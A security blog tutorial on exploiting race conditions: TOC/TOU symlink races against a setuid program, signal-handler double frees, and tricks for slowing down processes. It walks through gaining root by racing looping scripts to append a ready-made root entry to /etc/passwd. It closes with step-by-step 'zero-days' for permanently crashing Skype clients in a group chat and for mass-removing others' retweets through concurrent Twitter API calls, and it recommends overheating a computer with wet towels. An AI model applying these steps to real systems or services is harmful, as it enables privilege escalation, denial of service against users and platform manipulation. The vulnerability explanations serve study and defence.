Winning the race: Signals, symlinks, and TOC/TOU


Introduction:

So, before we dive right into things, just a few bits of advice: some programming knowledge, an understanding of what symbolic linking is within *nix and how it works, and an understanding of how multi-threading and signal handlers work will all be beneficial for following the concepts I'm going to be covering here. If you can't code then don't worry, as I'm sure you'll still be able to grasp the concepts, but having prior programming knowledge will give you a deeper understanding of how this actually works. It won't kill you to read up on the subjects I just mentioned, and by doing so you'll find this tutorial a lot easier to follow. Ideally, if you understand C/C++ and assembly language, then you should be able to pick up the concept of a practical (s/practical/exploitable) race condition bug relatively easily. Knowing your way around a debugger will also help.

Not all race conditions are vulnerabilities, but many race conditions can lead to vulnerabilities taking place. That being said, when vulnerabilities do arise as a result of race condition bugs, they can be extremely serious. There have been cases in the past where race condition flaws have affected critical national infrastructure, in one case even directly contributing to the deaths of multiple people (no kidding!).

Generally, within multi-threading, race conditions aren't an issue in terms of exploitability, but rather an issue of the intended program flow not going as planned (note "generally"; there can be exceptions where this can be used for exploitation rather than being a mere design issue).

Anyway, before getting into specific kinds of race condition bugs, it should be noted that these bugs can exist in anything from a low-level Linux application to a multi-threaded relational DBMS implementation. In terms of paradigm, if your code is purely functional, with no shared mutable state, then race conditions will not occur (I guess that particular use of terminology is interchangeable anyway: if your code suffers from race condition flaws, then it lacks functionality in the non-paradigm sense too).

 

So, what exactly are race conditions?

Let's take a moment to sit back and enter the land of imagination. For the sake of this post, let's pretend you're not a fat nerd sitting in your Mom's basement living off of beer and tendies while making sweet sweet love to your anime waifu pillow. Let's imagine, just for one moment, that you're someone else. You're not just any old someone, no. You're someone who does something important. You're a world-class athlete. You've spent the last 4 years training non-stop for the 100m sprint, and you are certain you are going to win the Gold Medal this year. The time finally comes: you are ready to race. During the sprint, you're neck and neck with Usain Bolt, both inches away from the finish line. By sheer chance, you both pass over the finish line at the exact same moment. The judges replay the footage in slow motion to see who crossed the finish line first, and unbelievably, you both crossed at the exact same moment, down to the very nanosecond! Now the judges have a problem. Who wins Gold? You? Usain Bolt? The runner-up who crossed the line right after you two? What if nobody wins? What if you're both given Gold, decreasing the subjective value of the medal? What if the judges call off the event entirely? What if they demand a re-match? What if a black hole suddenly spawns in the Olympic arena and causes the entire solar system to implode? Who the hell knows, right? Well, welcome to the wild and wacky world of race conditions!

This is Part One of a three-part series diving into the subject of race conditions; there's absolutely no way I can cover this whole subject in three blog posts. Try three books, maybe! Race conditions are a colossally huge subject with a wide variety of security implications, ranging from weird behaviour that poses no risk at all, to crashing a server, to full-blown remote command execution! Due to the sheer size of this topic, I suggest doing research in your own time between reading each part of this tutorial series.

While at first it might seem intimidating, this is actually a very simple concept to grasp (exploiting it, on the other hand, is a bit more hit and miss, but I'll get into that later). Race conditions stem from novice developers assuming that their code will execute in a linear fashion, or from developers implementing multi-threading in an insecure manner. If the program then attempts to perform two or more operations at the same time, the resulting changes in the program's code flow can end with undesirable results (or desirable, depending on whether you're asking the attacker or the victim!).

It should also be noted (as stated before) that race conditions aren't necessarily always a security risk; in some cases they just cause unexpected behaviour within the program flow without posing any actual risk. Race conditions can occur in many different contexts, even within basic electronics (and biology! Race conditions have been observed within the brains of live rats). I will be covering race conditions from an exploitation standpoint, mainly talking about race conditions within web applications and within vulnerable C programs.

The basic premise of a race condition bug is that two threads (or processes, or requests) "race" against each other, allowing the winner of said race to manipulate the control flow of the vulnerable application.

I’ll be touching lightly upon race conditions being present in multi-threaded applications and will give some brief examples, but this will mainly be focused on races as a result of signal handling, faulty access checks and symlink tricks. In addition to that, I’ll give some examples of how this class of bugs can be abused within Web applications. Race conditions cover such a broad spectrum that I simply cannot discuss all of it within one blog post, so I’ll give a quick overview of the basics, which hopefully you can build upon with your own research.

To give you a simpler analogy of what a race condition is, imagine you have an account with an online banking platform. Let's assume you open two separate browser tabs at once, both with the payment page loaded, and you set up both tabs so that you're ready to make a payment to another bank account. If you were to then click the button to make the payment in both tabs at identical times, the application could register that only one payment had been made, when in reality the payment had been sent twice while the money for only one of them was deducted from your balance. This is a very basic analogy of how a race condition could take place, although this exact scenario is highly unlikely to ever happen in the real world.
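To make that analogy concrete, here is a minimal C sketch of the same check-then-act mistake, assuming a shared balance variable and no locking at all (the balance, the amount and the artificial delay are purely illustrative; compile with gcc -pthread):

#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

int balance = 100;  /* shared state, deliberately unprotected */

void *make_payment(void *arg) {
  int amount = 100;
  if (balance >= amount) {   /* time of check */
    usleep(1000);            /* artificial delay to widen the race window */
    balance -= amount;       /* time of use */
    printf("payment of %d sent, balance now %d\n", amount, balance);
  } else {
    printf("payment refused\n");
  }
  return NULL;
}

int main(void) {
  pthread_t t1, t2;
  pthread_create(&t1, NULL, make_payment, NULL);
  pthread_create(&t2, NULL, make_payment, NULL);
  pthread_join(t1, NULL);
  pthread_join(t2, NULL);
  /* can end up at -100: both checks passed even though there was only enough for one payment */
  printf("final balance: %d\n", balance);
  return 0;
}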

I'm going to demonstrate some code snippets to explain this, in order to show the different kinds of races that are possible and to give examples in various languages, but I'll start with pseudo-code:

[Image: C-inspired pseudo-code example]
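The snippet in the original post is only shown as an image; a rough reconstruction of that C-inspired pseudo-code might look something like this (check_permissions() is an undefined placeholder, while something_is_permitted and doThis() are the names used in the discussion below):

#include <signal.h>

int something_is_permitted = 0;   /* shared state that can change under our feet */

void handler(int sig) {
  /* re-evaluates the permission state asynchronously, whenever a signal arrives */
  something_is_permitted = check_permissions();
}

int main(void) {
  signal(SIGUSR1, handler);

  something_is_permitted = check_permissions();  /* time of check */

  /* ...attack window: the state can change between the check and the use... */

  if (something_is_permitted)
    doThis();                                    /* time of use */

  return 0;
}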

The reason I'm giving these first examples in C (or C-flavoured pseudo-code) is because race conditions tend to be very common within vulnerable C applications. Specifically, you should be looking for the signal.h header, as this is generally a good indicator of a potential race condition bug being present (within issues regarding signal handling, at least). Another good indicator is the presence of access checks for files, as these can often lead to symlink races taking place (I will demonstrate this shortly). I will give other examples in other languages, and explain context-specific race condition bugs associated with such languages.

While the code above is clearly not a working example, it should allow me to illustrate the concept of race conditions. Let's assume an attacker sends two operations to the program at the same time, and the code flow states that if something is permitted, then the specified function gets executed. If timed correctly, an attacker could make it so that something is permitted at the time of the check, but no longer permitted at the time of use (this would be a TOC/TOU race, meaning "Time of Check / Time of Use").

So, for example, we can assume that the following test is being run:

if (something_is_permitted) // check if permitted

and the conditions for the if statement are met, so the code flow continues in the intended order. But by the time the function actually gets called, the thing that was permitted at the time of the check may no longer be permitted; the program has no way of knowing this, so it will execute the following code anyway:

doThis();

This will result in unintended program flow, and depending on the nature of the code, it could allow an attacker to bypass access controls, escalate privileges, cause a denial of service, and so on.

The impact of race condition bugs can vary greatly, ranging from a petty nuisance to critical exploits resulting in the likes of remote root. I’ll begin by describing various types of race conditions and methods of triggering them, before moving on to some real-world examples of race conditions and an explanation of how they can be tested for within potentially vulnerable web applications.

When most people think of race conditions, they imagine them to be something very fast-paced, and expect that the timing required to execute a TOC/TOU race needs to be extremely precise. While this is often the case, it is not always so. Consider the following example of a "slow-paced" race condition bug:

  • There exists a social-networking application where users have the ability to edit their profile
  • A user clicks the “edit profile” button and it opens up the webpage to allow them to make edits
  • User then goes AFK (Away from Keyboard)
  • The administrator finds an unrelated vulnerability in the profile editing section of the website, and as a result, locks down the edit functionality so that users can no longer edit their profile
  • User returns, and still has the profile editing page open in a browser tab
  • Despite users no longer being able to access the "edit profile" page, this user already has the page open and can continue to make edits despite the restriction put in place by the administrator

Race conditions can also take place as a result of latency within networks. Take an IRC network for example: let's assume that there is a hub and two linked nodes. Bob wants to register the channel #hax, but Alice also wants to register this same channel. Consider the following:

  • Bob connects to IRC from node #1
  • Alice connects to the IRC from node #2
  • Bob runs /join #hax 
  • Alice runs /join #hax
  • Both of these commands are run from separate nodes at around the same time
  • Bob becomes an operator of #hax
  • Alice becomes an operator of #hax
  • The reasoning for this is that, due to network latency, node #1 did not have time to tell node #2 that the services daemon had already assigned operator status to another user on the same network.

(PROTIP: When testing local desktop applications for race conditions (for example a compiled binary), use something like GDB or OllyDbg to set a breakpoint between the TOC and the TOU within the binary you are debugging. Resume execution from the breakpoint and take note of the results in order to determine any potential security risk, or lack thereof. This is for confirmation of the bug only, and not for actual exploitation. As the saying goes, PoC||GTFO. This rings especially true with race conditions, considering some of them are just bugs or glitches or whatever you wanna call them, as opposed to viable exploits with real attack value. If you cannot demonstrate impact, you probably should not report it.)

Symlinks and Flawed access checks:

Using symlinks to trigger race conditions is a relatively common method, and here I will give a working example of it. The example will show how a symlink race can be used to exploit a badly implemented access check in C/C++; this would allow an attacker to escalate privileges and get root on a server (assuming the server ran a program that was vulnerable in this manner). It should be noted that while writing to /etc/passwd in the manner I'm about to demonstrate will not work on newer operating systems, these methods can still be used to obtain read (or sometimes write) permissions on root-owned files that generally would not be accessible from a regular user account.

This method assumes that the program in question is being run with setuid access rights. The intended purpose of the program is to check whether you have permission to write to a specific file or directory (via an access(); check); if you have permission, it writes your input to the path of your choice. If you don't have permission, the access(); check is intended to fail, indicating that you're attempting to write to a directory or file that you lack the permissions to write to. For example, the /tmp directory is world-writeable, whereas a directory such as /etc requires additional permissions. The goal of an attacker here is to abuse symbolic linking to trick the program into thinking it is writing to /tmp, where the attacker has permission, when in fact it is writing to /etc, where they do not.

In modern Linux distributions (and in modern countermeasures implemented into languages such as C), there are ways of attempting to mitigate such an attack. For example, a C program can use the POSIX mkstemp(); function, rather than building a predictable file name and handing it to fopen(); or fwrite();, to create temporary files safely, and the mktemp(1) utility allows similar safe creation of temporary files from shell scripts on *nix-based systems. Another attempt at mitigating this in *nix-based systems is the O_NOFOLLOW flag for open() calls; the purpose of this flag is to make the open fail if the target is a symbolic link.
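As a minimal sketch of what those safer patterns look like in C (the paths and data here are purely illustrative):

#define _GNU_SOURCE   /* for O_NOFOLLOW on older glibc */
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
  /* mkstemp() creates AND opens the file atomically, so there is no window
     in which an attacker can swap the name for a symlink */
  char template_name[] = "/tmp/raceXXXXXX";
  int fd = mkstemp(template_name);
  if (fd == -1)
    return 1;
  write(fd, "hello\n", 6);
  close(fd);

  /* for a fixed path, O_NOFOLLOW makes open() fail if the final component
     is a symbolic link (file name is an illustrative assumption) */
  int fd2 = open("/tmp/fixedname", O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
  if (fd2 != -1)
    close(fd2);
  return 0;
}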

Take a look at the following vulnerable code (the race here is between the original program and a malicious process which will be run alongside it):

[Image: Example setuid program vulnerable to a typical TOC/TOU symlink race condition through means of an insufficient access check]
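The program itself is only shown as a screenshot in the original post; the following is a rough sketch of the typical shape of such a program (the argument handling and paths are my own, not the exact code from the image):

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  if (argc < 3) {
    fprintf(stderr, "usage: %s <file> <data>\n", argv[0]);
    return 1;
  }

  /* time of check: does the *real* user have write access to this path? */
  if (access(argv[1], W_OK) != 0) {
    fprintf(stderr, "access denied\n");
    return 1;
  }

  /* attack window: the attacker swaps argv[1] for a symlink to /etc/passwd here */

  /* time of use: the file is opened with the program's effective (root) privileges */
  FILE *f = fopen(argv[1], "a");
  if (f == NULL) {
    perror("fopen");
    return 1;
  }
  fprintf(f, "%s\n", argv[2]);
  fclose(f);
  return 0;
}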

I will be compiling and running this from my user account with the following privs (non-root):

[Image: output showing the non-root privileges of the user account used for the demo]

First, I will demonstrate this using a debugger (GDB, although others such as OllyDbg will suffice too), because it allows you to pause the execution of the program, making it far easier for the race condition to take place. In a real exploitation scenario you would need to trigger the race condition naturally, which I will demonstrate next.

Disassemble the code using your debugger of choice:

[Image: disassembly of the vulnerable binary]

Now, set a breakpoint at fopen(); so we can demonstrate a race condition without actually having to go through the steps to trigger one naturally:

break *0x80485ca

[Image: the breakpoint being set in GDB]

Then replace the target file with a symbolic link, like so:

[Image: the written file being replaced with a symbolic link to a restricted file]

Because you've paused execution at the breakpoint (i.e. after the access check has already passed), creating the symlink and then resuming the program causes the write to follow the link, so the program ends up writing your input to a file that would never have passed the access check in the first place.

Of course, using GDB or another debugger isn't possible in real-world scenarios, so you need some way of making the race condition happen naturally (instead of setting a breakpoint and pausing program execution with a debugger to get the timing right). One way of doing this is by repeatedly performing the two operations at the same time, until the race condition is met.

The following example will show how the access check in the vulnerable C program can be bypassed as a result of two bash scripts running simultaneously. Once the race is won, the access check is effectively bypassed and a new entry is written to /etc/passwd.

Script #1:

[Image: Script #1. This script should be run repeatedly until the condition is met, which is why it re-executes itself within a while loop]
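Script #1 is only shown as an image. As a rough C equivalent of what it does (the original bash script re-executes itself in a loop; the binary name ./vuln and its argument format follow my sketch earlier and are assumptions):

#include <stdlib.h>

int main(void) {
  /* hammer the setuid binary: every run performs the access() check followed by the privileged write */
  for (;;)
    system("./vuln /tmp/victimfile 'raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh'");
  return 0;
}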

Script #2:

[Image: Script #2. This script repeatedly attempts to make a symbolic link to /etc/passwd]
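Script #2 is also only shown as an image. A rough C equivalent of the idea (again, /tmp/victimfile is an assumed path matching the sketches above):

#include <stdio.h>
#include <unistd.h>

int main(void) {
  for (;;) {
    /* state 1: a regular, user-owned file, so the access() check in the target passes */
    unlink("/tmp/victimfile");
    FILE *f = fopen("/tmp/victimfile", "w");
    if (f != NULL)
      fclose(f);

    /* state 2: the same name now points at /etc/passwd, so the target's privileged write lands there */
    unlink("/tmp/victimfile");
    symlink("/etc/passwd", "/tmp/victimfile");
  }
  return 0;
}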

After a while of both of these scripts running at the same time, the timing should eventually line up so that the symbolic link is created after the access check has completed but before the file is opened, causing the check to be bypassed and data to be written to a previously restricted file (/etc/passwd in this case).

If all goes to plan, an attacker should be able to write a new entry to /etc/passwd with root privs:

raceme:2PYyGlrrmNx5.:0:0::/root:/bin/sh

From here, they can simply use 'su' to authenticate as a root user with the new 'raceme' account that they have created by adding an entry to /etc/passwd (the second field of the entry is a crypt(3) hash of a password the attacker already knows).

[Image: root shell obtained. g0t r00t!!]

 

Race Conditions within Signal Handling:

If you do not understand the concept of Signal Handlers within programming then now is probably a good time to become familiar with the subject, as it is one of the primary causes of race condition flaws.

The most common occurrence of race conditions within signal handlers is when the same function is installed as the handler for multiple different signals, and those signals arrive within a short time-frame of each other (hence the race condition). Non-reentrant signal handlers are the primary culprit behind signal-based races posing an issue. If you're unfamiliar with the concept of non-reentrance within signal handling, then I really do suggest reading into the topic in depth, but if you're like me and have a TL;DR attitude and just wanna go hack the planet already, then I will offer a short and sweet explanation (the terminology alone is somewhat self-explanatory, in all honesty).

If a function has been installed as a signal handler, and that function either maintains internal state or calls another function that maintains internal state, then it is a non-reentrant function, and this means there is a higher probability of a race condition being possible.

For an example demonstrating the exploitability of race condition bugs associated with signal handlers, I will be using the free(); function (associated with dynamic memory allocation in C/C++) to trigger a traditional and well-known application-security flaw referred to as a "double free". The following code example shows how an attacker could craft a specifically timed payload. If you haven't spotted the common trend here yet: race conditions are all about timing. Generally attackers will have their payloads running concurrently in a for/while loop, or they'll create a ghetto-style "loop" of sorts by having payload1.sh repeatedly execute payload2.sh, which in turn repeatedly executes payload1.sh, and so on. The reasoning for this is that, in many contexts, for a race condition to be successful the requests need to be made concurrently, sometimes even down to the exact millisecond. Rather than executing their payload once and hoping they got their one-in-a-million chance of getting the timing exactly right, it makes far more sense to use a loop to repeatedly execute the payload, as with each iteration of the loop the attacker has another chance of getting the timing right. Pair this with methods of slowing down the execution of certain processes, and the attacker has now increased their window (the "window" in this instance referring to the viable time in which the race condition can occur, allowing the attack to be carried out). For example, with a TOC/TOU race, the "attack window" is the time between the check taking place ("TOC", Time of Check) and the moment the action actually occurs ("TOU", Time of Use). The attack window here is the time frame in which the result of the check says the action is permitted, and for that very short period (or "window") it is permitted... right up until the state changes or the check is carried out again, at which point the action is no longer permitted and the window has closed. To summarise, successfully exploiting a race condition usually comes down to a combination of the following:

  • Maximising the window in which the attack can be carried out by slowing down particular aspects of program/process execution (I cover methods of doing this in the "Methods of slowing down process execution" section below)
  • Making as many concurrent attempts at triggering the race as possible within the time-frame dictated by the length of your attack window (use multiple threads where possible)
  • Testing manually with a debugger by setting a breakpoint between the TOC and the TOU
  • Having lots of processing power available to make as many concurrent requests as possible during your attack window (while using the methods I describe to slow down other elements of process execution at the same time)

Below you can find an example of a race condition present via signal handling, with the triggering of a double free as a proof of concept. The code example installs the same non-reentrant signal handler function for two different signals, and that handler makes use of shared state: it calls free(); on global pointers. An attacker could send two different signals to the process at (almost) the same time, resulting in memory corruption as a direct result of the race condition itself. If you have experience with C/C++ and dynamic memory allocation then you're probably aware of the issues posed by calling free(); twice with the same argument. For those who are not aware, this is known as a "double free" bug, and it results in the program's memory-management structures becoming corrupted, which can cause a multitude of problems ranging from segfaults and crashes to arbitrary code execution, as the attacker may be able to control the data written into the memory region that has been doubly freed, effectively giving them a heap overflow. So while any RCE would be triggered by the overflow, which in turn is triggered by the double free, the double free itself is triggered as a result of a race condition occurring due to two separate signals being delivered to the same signal handler, which, without getting overly technical, essentially makes malloc(); throw a hissy-fit and poop its pants. The following code demonstrates this issue:

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

char *globvar;
char *globvar2;

void vuln(int pwn) {
  // some lame signal handler: free()s shared global state
  free(globvar);
  free(globvar2);
  // if a second signal arrives, the same pointers get freed again: double free
}

int main(int argc, char *argv[]) {
  globvar = malloc(64);
  globvar2 = malloc(64);
  // overflowz and code exec: the same non-reentrant handler is installed for two different signals
  signal(SIGHUP, vuln);
  signal(SIGTERM, vuln);
  // wait around for the signals to arrive
  for (;;)
    pause();
  // all due to a pesky race condition
}
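To actually trigger the double free here, an attacker would deliver both signals to the running process in quick succession (for example SIGHUP immediately followed by SIGTERM), so that the second invocation of vuln(); frees pointers that the first invocation has already freed.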

There are a number of reasons why signal handling can result in race conditions, although using the same function as a handler for two or more separate signals is one of the primary culprits.

Here is a list of reasons as to what could trigger a race condition via signal handling (from Mitre’s CWE Database):

  • Shared state (e.g. global data or static variables) that are accessible to both a signal handler and “regular” code
  • Shared state between a signal handler and other signal handlers
  • Use of non-reentrant functionality within a signal handler – which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution.
  • Association of the same signal handler function with multiple signals – which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses.
  • Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality
  • While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses.

Out of everything just listed, the most common reasons are either that one signal handler is being used for multiple signals, or that two or more signals arrive in close enough succession to each other to fit within the attack window for a TOC/TOU race condition.

 

Methods of slowing down process execution:

Slowing down the execution of the target program is almost vital if you want to trigger race conditions consistently, so here I will describe some of the common methods that can be used to achieve this. Some of these methods are outdated and will only work on older systems, but they are still worth including (especially if you're into CTFs).

Deep symlink nesting (described in more detail below) is one old method that can be used to slow down program execution in order to aid race conditions. Another method is changing the value of the environment variable LD_DEBUG; setting this causes the dynamic linker to write debug output to stderr, and if you then redirect stderr into a pipe, it can slow down or even completely stall the setuid binary in question. To do this you would do something as follows:

LD_DEBUG=all some_program 2>&1

Usage of LD_DEBUG is somewhat outdated and no longer relevant for setuid binaries since glibc 2.3.4; that being said, it can still be used for some more esoteric bugs affecting legacy systems, and also occasionally shows up in CTF solutions.

Another method of slowing down program execution is lowering its scheduling priority through use of the nice or renice commands. Technically this isn't slowing down the program's execution as such; rather, it forces the Linux scheduler to allocate fewer time slices to the program, resulting in it running at a slower rate. It should also be noted that this can be achieved within code (rather than as a terminal command) through use of the nice(); function. If the nice value is negative, the process runs with higher priority; if it is positive, the process runs with lower priority. For example, setting the following value will cause the process to run at a ridiculously slow rate (relative to everything else competing for the CPU):

nice(19)

If you're familiar with writing Linux rootkits, then you may already be aware of these methods: you can also use dynamic linker tricks via LD_PRELOAD to slow down the execution of processes. This can be done by hooking common functions such as malloc(); or free(); so that, once said functions are called within the vulnerable program, their execution is delayed by however much you choose.
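As a rough sketch of the idea, here is a tiny LD_PRELOAD library that wraps free() and adds an artificial delay (the delay, file names and build line are illustrative; note that the dynamic linker ignores LD_PRELOAD from the environment for setuid binaries, just as it does LD_DEBUG):

// slowfree.c: build with  gcc -shared -fPIC slowfree.c -o slowfree.so -ldl
// then run the target with  LD_PRELOAD=./slowfree.so ./target
#define _GNU_SOURCE
#include <dlfcn.h>
#include <unistd.h>

void free(void *ptr) {
  static void (*real_free)(void *) = NULL;
  if (real_free == NULL)
    real_free = (void (*)(void *))dlsym(RTLD_NEXT, "free");  // look up the real libc free()
  usleep(50000);   // stall for ~50ms on every free(), widening the race window
  real_free(ptr);
}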

One extremely trivial way of slowing down the execution of a program is to simply run it within a virtualized environment. If you're using a virtual machine, there should be options available that allow you to limit the amount of CPU and RAM allocated to it, letting you test the potentially vulnerable program in a more controlled environment where you can slow things down with ease. This method will only work while testing for certain classes of race conditions.

One crude method of slowing down program/process execution in order to increase the chance of a race condition occurring is to take physical measures to overheat your computer, putting strain on its ability to perform computational tasks. Obviously, this is dangerous for the health of your device, so don't come crying to me if you wind up breaking your computer. There are many ways to do this, but the way I've seen it done (which, according to my crazy IRL hacker friend, is supposedly one of the safer methods of physically overheating your computer) is to simply wet a towel (or a bunch of towels) and wrap it around your device, making sure that the fan in particular is covered completely.

Deep symlink nesting can also be used to slow down the execution of the program, which is extremely valuable while attempting to exploit race conditions. This is a very old and well-documented method, although these days it is practically useless (unless you're exploiting some old, obscure system, or doing it for a CTF; I have seen this method utilized in CTF challenges before). Since Linux kernel 2.4.x, this method has been mitigated through a limit on the maximum number of symlink dereferences permitted during lookups, alongside limits on nesting depth. Despite the method being practically dead, I figured it's still worth covering because there are still some obscure cases where it can be utilized.

Below is a script written by Rafal Wojtczuk demonstrating how this can be done (the example shown here can be found at Hacker's Hut):

[Image: Rafal Wojtczuk's shell script for building a deeply nested symlink chain]

This will cause the kernel to take a ridiculously long time to access a single file. Here is the situation after the above script is executed:

drwxr-xr-x 2 aeb 4096 l
lrwxrwxrwx 1 aeb 53 l0 -> l1/../l1/../l1/../l/../../../../../../../etc/services
lrwxrwxrwx 1 aeb 19 l1 -> l2/../l2/../l2/../l
lrwxrwxrwx 1 aeb 19 l2 -> l3/../l3/../l3/../l
lrwxrwxrwx 1 aeb 19 l3 -> l4/../l4/../l4/../l
lrwxrwxrwx 1 aeb 19 l4 -> l5/../l5/../l5/../l
drwxr-xr-x 2 aeb 4096 l5

The more depth you ask the script for via its parameters, the deeper the symlink nesting becomes, meaning it can take days or even weeks for a single lookup to complete. On older machines, this results in an application-level DoS.
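For reference, here is a rough C sketch that reproduces the layout shown in the listing above (the original is a parameterised shell script; the fixed depth and the three-way repetition here are taken from the listing, not from the script itself):

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void) {
  char name[16], target[128];

  mkdir("l", 0755);   /* the directory every chain eventually resolves into */
  mkdir("l5", 0755);  /* the deepest level is a plain directory */

  /* l0 bounces through l1 three times before reaching the real target */
  symlink("l1/../l1/../l1/../l/../../../../../../../etc/services", "l0");

  /* l1..l4 each bounce through the next level three times */
  for (int i = 1; i <= 4; i++) {
    snprintf(name, sizeof(name), "l%d", i);
    snprintf(target, sizeof(target), "l%d/../l%d/../l%d/../l", i + 1, i + 1, i + 1);
    symlink(target, name);
  }

  /* resolving l0 now forces the kernel to walk the chain an exponential number of times (3 branches per level) */
  return 0;
}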

There are many other ways in which symbolic links can be abused in order to achieve race conditions; if you want to learn more about this then I'd suggest googling, as there's simply too much to explain in a single blog post.

Yet another method to slow down program execution is by increasing the timer interrupt frequency in order to force more load onto the kernel. Timer Interrupts within the Linux Kernel have a long and extensive history, so I will not be going in-depth here.

In part 2 of this tutorial series you can expect many more advanced methods to slow down process execution.

 

Final notes (and zero-days):

I intentionally chose to leave out a number of methods for testing/exploiting race condition bugs within web applications, although I’ll be covering these in-depth in Part 2 of my race condition series.

Meanwhile, I’ll give you an overview of what you can expect with Part 2, while also leaving you two race condition 0day exploits to (ethically) play around with.

The second part of my tutorial series regarding race conditions is going to have a primary emphasis on race conditions in webapps, which I touched upon lightly in this current post. This post was my attempt at explaining what race conditions are, how they work, how to (ab)use them, and the implications of their existence in regards to bug bounty hunting. Now that I’ve covered what these bugs are and also provided a few examples of real working exploits demonstrating that race conditions do indeed exist within webapps, I’m going to be spending most of part two covering the following three areas:

  • More advanced techniques for identifying race conditions specifically within web applications, methods of bypassing protections against them, and lucrative sections of webapps to test in order to increase your chances of finding race condition bugs on a regular basis.
  • More advanced (and several private) techniques used to slow down process execution, both within regular applications and within web applications (although mostly with emphasis on web applications, since that will be the primary theme of Part 2), including practical dynamic linker tricks that hook (g)libc functions via LD_PRELOAD in userland/ring3, exactly like you would do with a rootkit, but with the emphasis on slowing down program/process execution through the added strain on the hooked functions, as opposed to using the dynamic linker for stealth-based hooking. We are talking about exploiting race conditions here, not writing rootkits, so while some of these techniques are kind-of interchangeable, the methods I'll be sharing would be very inefficient for an LD_PRELOAD-based rootkit, as they would make the victim's machine slow as shit. For maintaining persistence on a hacked box, that is terrible; for slowing down process execution to increase the odds of a race condition, it is great! You can expect me to expand upon dozens of methods of slowing down process execution to increase your odds of winning that race!
  • Finally, just like this first part of my race condition exploitation series, I'll be continuing the trend by once again including two new zero-day exploits, both of which are race condition bugs.

 

Skype Race Condition 0day:

  • Create a Skype group chat
  • Add a bunch of people
  • Make two Skype bots and add them to the chat
  • Have one bot repeatedly set the topic to ‘lol’ (lowercase)
  • Have the other bot repeatedly set the topic to ‘LOL’ (uppercase)

For example, bot #1 repeatedly sends "/topic lololol" to the chat and bot #2 repeatedly sends "/topic LOLOLOL".

If performed correctly, this will break the Skype client for everyone in the group chat. Every time they reload Skype, it will crash. It also makes it impossible for them to leave the group chat, no matter what they try. The only ways around this are to either create a fresh Skype account, or to completely uninstall Skype, access Skype via the web (web.skype.com) to leave the group, and then reinstall Skype.

 

Twitter API TOC/TOU Race Condition 0day:

There was a race condition bug affecting Twitter's API. This is a generic TOC/TOU race condition which allows various forms of unexpected behaviour to take place. By sending API requests to Twitter concurrently, it is possible to delete other people's likes/retweets/followers. You would write a script with multiple threads, some threads sending an API request to retweet or like a tweet (from a third-party account), and the other threads simultaneously removing likes/RTs of the same tweet from the same third-party account, once again via requests to Twitter's API. As a result of the race condition, this removes multiple likes and retweets from the affected post, rather than only the likes and retweets that the third-party account's API requests were meant to remove. While this has no direct security impact, it can drastically affect the outreach of a popular tweet. While running this script to send the API requests simultaneously from a third-party account, we managed to reduce a tweet with 2000+ retweets down to 16 retweets in a matter of minutes. The proof-of-concept code for this will be viewable within the "Exploits and Code Examples" section of the upcoming 0xFFFF site where we plan to eventually integrate this blog. To see how this works in detail, you can read the full writeup here, published by a member of our team.
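To make the shape of such a test concrete, here is a minimal, hypothetical C skeleton of the concurrent-request pattern described above; send_retweet_request() and send_unretweet_request() are placeholders standing in for whatever authenticated HTTP plumbing would actually be used, the tweet ID is made up, and this is not the PoC referred to above:

#include <pthread.h>

/* placeholders: in a real test these would make authenticated API calls */
static void send_retweet_request(long tweet_id)   { (void)tweet_id; }
static void send_unretweet_request(long tweet_id) { (void)tweet_id; }

static const long target_tweet = 1234567890L;  /* made-up tweet ID */

static void *retweeter(void *arg) {
  (void)arg;
  for (int i = 0; i < 100; i++)
    send_retweet_request(target_tweet);
  return NULL;
}

static void *unretweeter(void *arg) {
  (void)arg;
  for (int i = 0; i < 100; i++)
    send_unretweet_request(target_tweet);
  return NULL;
}

int main(void) {
  pthread_t threads[8];
  /* half the threads add the retweet, the other half remove it, all concurrently */
  for (int i = 0; i < 8; i++)
    pthread_create(&threads[i], NULL, (i % 2) ? unretweeter : retweeter, NULL);
  for (int i = 0; i < 8; i++)
    pthread_join(threads[i], NULL);
  return 0;
}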

 

That’s all for now — part two will be coming soon with more zerodays and a much bigger emphasis on exploitation of race condition bugs within web applications.

 

Source: https://blog.0xffff.info/2021/06/23/winning-the-race-signals-symlinks-and-toc-tou/
